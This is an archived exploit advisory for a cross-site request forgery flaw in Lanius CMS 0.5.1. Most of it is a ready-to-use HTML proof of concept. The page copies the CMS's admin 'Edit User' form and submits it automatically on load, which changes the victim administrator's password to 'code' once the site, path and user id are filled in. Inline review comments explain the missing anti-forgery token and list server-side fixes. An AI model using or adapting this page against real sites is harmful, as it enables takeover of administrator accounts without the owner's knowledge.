Lanius CMS 0.5.1 XSRF

2009-02-10 00:00:00
d14l
packetstormsecurity.com
35
`[-]Lanius CMS 0.5.1 CSRF vulnerability  
  
[-]exploit found by d14l and marcoj  
  
  
  
[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others  
  
  
[-] Lanius CMS suffers from a CSRF vulnerability which allows an attacker to change the admin's password  
  
  
  
Only [site], [path] and the victim's [id] need to be changed in the source; the page will then change the victim's password to "code"  
  
  
  
  
  
  
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////  
  
  
  
  
<!-- NOTE(review): the markup below appears to be a saved copy of the CMS's own
     "Edit User" admin page; its scripts, styles and menu are referenced as-is. -->
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
// id of the admin <form> further down the page; the inline helpers below
// resolve the form element through this name.
var lcms_data_form='adminform';
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />
  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
/**
 * Hooks the password-quality meter onto the password field once the page has
 * loaded. initQualityMeter and pb_addEvent come from the scripts included in
 * the head (progressbar.js / passwordquality.js, by name — not visible here).
 */
function _init_pwd_box() {
  var passwordFieldName = "user_password";
  var meterTargetId = "the_password";
  var meterLabel = "Password quality: ";
  initQualityMeter(passwordFieldName, meterTargetId, meterLabel);
}
// Defer the hook-up until the DOM (and the password field) exists.
pb_addEvent(window, "load", _init_pwd_box);
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
  
// Folder holding the selectable avatar images, and the image shown when no
// avatar is chosen.
var dil_folder = 'media/forum/avatars/';
var dil_default_src = 'media/forum/avatars/default.png';

/**
 * Updates the avatar preview image to match the <select> value.
 *
 * @param {HTMLSelectElement} srcObj      the avatar select; only .value is read
 * @param {string}            srcListName name of the select; the preview
 *                                        element's id is "image_" + this name
 */
function changeImage(srcObj,srcListName) {
  var preview = document.getElementById("image_"+srcListName);
  var chosen = srcObj.value;
  // null or empty selection falls back to the default image; anything else is
  // looked up inside the avatar folder.
  var nothingChosen = (chosen==null || chosen=="");
  preview.src = nothingChosen ? dil_default_src : dil_folder+chosen;
}
  
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
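/**
 * Client-side gate in front of the admin form's submit helper lcms_st
 * (defined in a script loaded elsewhere — presumably anthill.js; not visible
 * here).
 *
 * 'save'   : the three required text fields (user_name, user_user,
 *            user_email) must be non-empty; the first empty one triggers an
 *            alert and the function returns false without submitting.
 * 'cancel' : navigates to the form's action URL and returns without calling
 *            lcms_st.
 * anything else (and a 'save' that passed the checks) is handed to lcms_st.
 *
 * This is a usability check only: any HTTP client can post the form
 * directly, so the server must re-validate the fields and, for a
 * state-changing request like this one, require a per-session anti-forgery
 * token — the page itself carries none.
 *
 * @param {string} pressbutton  'save', 'cancel' or another task name
 * @returns {boolean|undefined} false when a required field is empty
 */
function ui_lcms_st(pressbutton){
  // Resolve the form once through the configured id; the save branch reuses
  // it instead of a second lookup by a literal id.
  var frm=document.getElementById(lcms_data_form);
  if ( pressbutton == 'save' ) {
    // Required fields in the order they appear on the form, with the label
    // shown in the alert.
    var required = [
      ['user_name', "Display name"],
      ['user_user', "Username"],
      ['user_email', "Email"]
    ];
    for (var i = 0; i < required.length; i++) {
      // local, not an implicit global as a bare assignment would create
      var field_value = frm[required[i][0]].value;
      if (!field_value.length) {
        alert("Invalid value for\n\n" + required[i][1]);
        return false;
      }
    }
  }
  if ( pressbutton == 'cancel' ) {
    document.location.href=frm.action; return;
  }
  lcms_st(pressbutton);
}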
  
/* ]]> */  
</script>  
<script language="javascript" type="text/javascript">
// Base path for the admin menu theme images; presumably consumed by the
// JSCookMenu / ThemeDefault scripts included right after this — confirm.
var cmThemeDefaultBase = "admin/templates/default/images/";
</script>
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>
<script language="javascript" src="index2.php?option=service&service=admin_menu&no_html=1&lang=en" type="text/javascript"></script>
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>

<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />
<!-- NOTE(review): </head> closes a head element that is never opened, and
     <body> is opened twice (here and on the next line); the page depends on
     the browser's error recovery. -->
</head>
<body>
<!-- The onload handler runs the form's 'save' path with no user interaction.
     That the server then accepts the resulting POST on the strength of the
     session cookie alone is the CSRF root cause described in the advisory. -->
<body onload="ui_lcms_st('save');">

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="320" class="top-logo" >
<img src="admin/templates/default/images/header.png" alt="Administration" />
</td>
<td width="240" class="top-update" >
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a>
</td>
<td align="right" class="top-logo" ><a href="index.php?option=login&task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>

</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr class="toolmenu">
<td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>
<script language="javascript" type="text/javascript">
// myMenu and cmThemeDefault are expected from the admin_menu / theme scripts
// included in the head (not visible here).
cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");
</script>
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>
<td align="right">
<table class="hotlinks" border="0" cellspacing="0" cellpadding="2">
<tr><td>&nbsp;</td>

</tr>
</table>
</td>
<td align="right"></td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0">
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&task=edit&cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>
</tr>

</table>
<div class="dka_component">
<!-- NOTE(review): a state-changing POST with no per-session anti-forgery
     token among its fields. The fix belongs server-side: emit a token bound
     to the session and reject requests that do not carry it, set SameSite on
     the session cookie, and require the current password (or a fresh login)
     before accepting a password change for any account. -->
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>

<tr><td colspan='2' class="header1" >Edit User</td></tr>

<tr><td colspan="2">
<table width="100%" border="0" cellpadding="5" cellspacing="2" >
<tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>

<td class="tabbody">
<table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">
<tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="[email protected]" class="tf" size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">
<option value="" selected="selected" style="color: grey">-- Auto --</option>
<option value="en">English</option>
</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">

<option value="">-- Auto --</option>
<option value="Africa/Abidjan">Africa/Abidjan</option>

</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">
<option value="1">Registered</option>
<option value="2">Editor</option>
<option value="3">Publisher</option>
<option value="4">Manager</option>
<option value="5" selected="selected" style="color: grey">Administrator</option>

</select>
</td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<!-- The password fields are accepted without the account's current password;
     a change-password flow that re-checks the current credential (or
     re-authenticates) is not satisfiable by a forged request. -->
<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">
<input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">
<input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach">
<input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br />
<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >
<option value="default.png" selected='selected' >< Current ></option>

<option value="abstract8.png" >abstract8.png</option>


</select></td>
<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>
</tr></table>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
// Pre-fetches the default avatar so the preview swap has it cached.
var tmpi_0 = new Image();
tmpi_0.src="media/forum/avatars/default.png";

/* ]]> */
</script>
</div>
<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div>
<div class="dk_content">
<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>

<p><h3>Forum user information</h3></p>
<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>
<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>
<table border="0">
<tr>
<td valign="top">&nbsp;</td>
<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>

</td>
</tr>
<tr>
<td valign="top">User provided information (max 1024 characters)</td>
<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>
</tr> <tr>
<td valign="top">&nbsp;</td>

<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
</td>
</tr>
<tr>
<td valign="top">Custom signature (max 300 characters)</td>

<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>
</tr> </table></td></tr>

</table></td></tr></table>
</td></tr>
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div></form></div>
<div class="footer">
<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">

<!-- CMS footer: target="_blank" without rel="noopener" — minor, unrelated to
     the advisory. -->
<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_xclick" type="hidden" />
<input name="business" value="[email protected]" type="hidden" />
<input name="no_shipping" value="0" type="hidden" />
<input name="lc" value="EN" type="hidden" />
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />
<input name="currency_code" value="EUR" type="hidden" />
<input name="amount" value="10.00" type="hidden" />
Support the Lanius CMS Project with a small donation:
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />
</form>
</div>
</div>
</body>
</html>
  
////////////////////////////////////////////end of code////////////////////////////////////////////////`